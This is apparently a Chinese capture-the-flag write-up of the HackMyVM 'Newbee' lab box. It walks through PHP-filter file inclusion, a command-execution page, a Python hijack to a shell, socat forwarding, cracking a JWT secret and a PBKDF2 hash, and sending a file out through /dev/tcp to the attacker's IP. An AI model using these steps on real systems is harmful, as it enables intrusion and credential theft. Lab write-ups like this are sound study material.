HMV-Newbee靶机复盘
端口扫描 1 2 3 4 5 6 7 8 9 10 11 12 ┌──(root㉿kakeru)-[~/tmp] └─# nmap -p- 192.168.80.150 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-30 20:50 CST Nmap scan report for bogon (192.168.80.150) Host is up (0.0016s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http MAC Address: 56:99:F1:13:6A:38 (Unknown) Nmap done: 1 IP address (1 host up) scanned in 1.95 seconds
只有两个常见的端口 直接去web里面看
web探测 web这里是一个模板,有很多其他的模板,但是都是静态页面,没有有用的信息,也不能交互
1 2 </html> <!--Wrong paramter to GET-->
这里要一个get参数,那就用fuzz扫一下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ┌──(root㉿kakeru)-[~/tmp] └─# wfuzz -u http://192.168.80.150?FUZZ=id -w /usr/share/wordlists/wfuzz/general/common.txt --hw 1267 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://192.168.80.150?FUZZ=id/ Total requests: 951 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000384: 200 376 L 1270 W 18863 Ch "hack"
得到hack参数,现在用这个参数再curl一下,发现提示不一样了。
1 2 </html> <!-- include failed try another file -->
这里说要include一个文件 尝试一下用php伪协议读一下文件也不能直接读出/etc/passwd,看来是要读取什么特定的文件
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 ┌──(root㉿kakeru)-[~/tmp] └─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -u 192.168.80.150 -x php,txt,jpg,js =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.80.150 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: php,txt,jpg,js [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /.php (Status: 403) [Size: 279] /index.php (Status: 200) [Size: 18852] /contact.php (Status: 200) [Size: 8853] /about.php (Status: 200) [Size: 10036] /products.php (Status: 200) [Size: 12163] /blog.php (Status: 200) [Size: 9782] /terms.php (Status: 200) [Size: 6670] /assets (Status: 301) [Size: 317] [--> http://192.168.80.150/assets/] /testimonials.php (Status: 200) [Size: 7907] /javascript (Status: 301) [Size: 321] [--> http://192.168.80.150/javascript/] /checkout.php (Status: 200) [Size: 13307] /secret.php (Status: 200) [Size: 2187]
不一样的是这个secret.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ┌──(root㉿kakeru)-[~/tmp] └─# curl 192.168.80.150/?hack=php://filter/read=convert.base64-encode/resource=secret.php <?php if (isset($_COOKIE['AreYouAdmin']) && $_COOKIE['AreYouAdmin'] === 'Yes') { if (isset($_GET['command'])) { $command = $_GET['command']; $output = shell_exec($command); echo '<div>\> ' . htmlspecialchars($command) . '</div>'; echo '<div>' . nl2br(htmlspecialchars($output)) . '</div>'; } } else { echo '<div>No permission to execute commands, lacking admin permission.</div>'; } ?>
这里的验证逻辑是有没有Cookie 的 AreYouAdmin 如果有就可以执行命令
提权 www用户可以用debian用户执行一个python文件,现在直接用python库劫持就可以得到debian用户的shell
1 2 3 4 www-data@Newbee:/var/www/html$ echo "import os; os.system('/bin/bash')" > random.py www-data@Newbee:/var/www/html$ sudo -u debian /usr/bin/python3 /var/www/html/vuln.py sudo: unable to resolve host Newbee: Name or service not known debian@Newbee:/var/www/html$
debian用户没有sudo
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 debian@Newbee:~$ ls -al total 60 drwx------ 5 debian debian 4096 Mar 25 06:24 . drwxr-xr-x 4 root root 4096 Jul 11 2023 .. -rw-r--r-- 1 root root 0 Mar 7 00:10 .bash_history -rw-r--r-- 1 debian debian 220 Mar 7 00:10 .bash_logout -rw-r--r-- 1 debian debian 3526 Jul 11 2023 .bashrc drwx------ 3 debian debian 4096 Mar 6 21:40 .gnupg -rw------- 1 debian debian 119 Mar 25 06:24 .mysql_history -rw-r--r-- 1 debian debian 807 Jul 11 2023 .profile drwxr-xr-x 2 root root 4096 Mar 25 08:02 .secret drwxr-xr-x 2 debian debian 4096 Mar 8 23:01 .ssh -rw------- 1 debian debian 9049 Mar 6 22:25 .viminfo -rw-r--r-- 1 root root 151 Mar 6 21:25 config.php -rw-r--r-- 1 root root 120 Mar 6 21:26 note.txt -rw-r--r-- 1 debian debian 33 Mar 6 21:45 user.txt
1 2 debian@Newbee:~$ cat note.txt Damn it, I forgot my database password. I heard that Debian is currently building a message board, maybe he can help me
提示是数据库密码
1 2 3 4 5 6 7 debian@Newbee:~$ cd .secret/ debian@Newbee:~/.secret$ ls hint.txt password.zip debian@Newbee:~/.secret$ cat hint.txt password is md5(key) and key is in mysql!!!!!!
进入secret之后还有一个提示,密码是数据库里面的 md5 这个密码可以用来解开zip文件
1 2 3 4 5 6 7 8 debian@Newbee:~/.secret$ ss -lntup Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:* tcp LISTEN 0 128 127.0.0.1:5000 0.0.0.0:* tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:* tcp LISTEN 0 511 *:80 *:* tcp LISTEN 0 128 [::]:22 [::]:*
输入ps -ef查看现在的进程,可以发现下面这个信息
1 2 root 561 549 0 07:49 ? 00:00:00 /bin/sh -c /usr/bin/python3 /var/www/html/flask/main.py root 565 561 0 07:49 ? 00:00:07 /usr/bin/python3 /var/www/html/flask/main.py
也就是开了一个flask服务,那现在把这个端口转发一下,然后去web里面看看
1 2 debian@Newbee :~/ .secret$ socat TCP -LISTEN: 9999 ,fork TCP4: 127.0 .0.1 : 5000 & [1 ] 992
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ┌──(root㉿kakeru)-[~/tmp] └─# echo "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InNkZmEiLCJleHAiOjE3NDMzNDQ5ODR9.ROPsqvA8LkCdvHB0NTE5vSC0tDiw91aaCAAU9n0E5-E" > hash ┌──(root㉿kakeru)-[~/tmp] └─# john hash Using default input encoding: UTF-8 Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 128/128 ASIMD 4x]) Will run 4 OpenMP threads Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, almost any other key for status Almost done: Processing the remaining buffered candidate passwords, if any. Proceeding with wordlist:/usr/share/john/password.lst Proceeding with incremental:ASCII noob (?) 1g 0:00:00:02 DONE 3/3 (2025-03-30 21:30) 0.4385g/s 3999Kp/s 3999Kc/s 3999KC/s tykya2..savolie1 Use the "--show" option to display all of the cracked passwords reliably Session completed.
得到这个jwt的密码noob
1 2 3 4 5 mysql -u root -p show databases; use user; show tables; select * from user;
得到
1 2 3 4 5 6 +----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+ | id | username | passwd | salt | passwd_hash_algo | +----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+ | 1 | debian | 2c082e3ff2ca15e3b24f815d70653f0dead09534495069dd140e19adb2d117266cc4b1de8daf55c7c4827a0a5ccf70c6f537ffc4ddc74db4865c41c0 | 8bf3e3452b78544f8bee9400d6936d34 | pbdf2$50500$60 | +----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+ 1 row in set (0.064 sec)
然后可以让ai写一个脚本破解密码
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 import hashlibsalt = bytes .fromhex("8bf3e3452b78544f8bee9400d6936d34" ) hash_stored = bytes .fromhex("2c082e3ff2ca15e3b24f815d70653f0dead09534495069dd140e19adb2d117266cc4b1de8daf55c7c4827a0a5ccf70c6f537ffc4ddc74db4865c41c0" ) iterations = 50500 hash_length = 60 def dictionary_attack (): with open ("/Users/kakeru/tools/字典/password.lst" , "r" , encoding="utf-8" ) as f: for password in f: password = password.strip() hash_attempt = hashlib.pbkdf2_hmac("sha256" , password.encode(), salt, iterations, dklen=hash_length) if hash_attempt == hash_stored: print (f"[+] 找到密码: {password} " ) return else : print (f"[-] 失败: {password} " ) print ("[-] 未找到匹配的密码" ) dictionary_attack()
得到密码1qaz2wsx 然后把这个密码md5一下
1 2 3 4 5 6 7 8 debian@Newbee:~/.secret$ echo -n "1qaz2wsx" | md5sum 1c63129ae9db9c60c3e8aa94d3e00495 - debian@Newbee:~/.secret$ unzip password.zip Archive: password.zip [password.zip] password.png password: error: cannot create password.png Permission denied
但是无法创建文件,所以先把password.zip文件放在tmp目录下面,然后再解压
1 2 3 debian@Newbee:/tmp$ cat password.png > /dev/tcp/192.168.80.11/1234 ┌──(root㉿kakeru)-[~/tmp] └─# nc -lp 1234 > a.png
发现这是一个马赛克,所以搜一下马赛克隐写https://github.com/spipm/Depixelization_poc
1 2 3 4 (base) kakeru@bogon Depixelization_poc - main % python3 depix.py \ - p /Users/ kakeru/Downloads/ a.png \ - s images/searchimages/ debruinseq_notepad_Windows10_closeAndSpaced.png \ - o /Users/ kakeru/Downloads/ b.png
得到一个b.png 这个虽然解出来还是看不出来,但是发现这是这个项目的示例马赛克,所以得到密码
hellofromtheotherside
1 2 3 4 debian@Newbee:/tmp$ su - root Password: root@Newbee:~# id uid=0(root) gid=0(root) groups=0(root)
总结
php伪协议查看文件
学习jwt攻击
用ss 看有没有其他开放的端口服务,然后用socat转发
pbkdf2爆破脚本
马赛克隐写学习
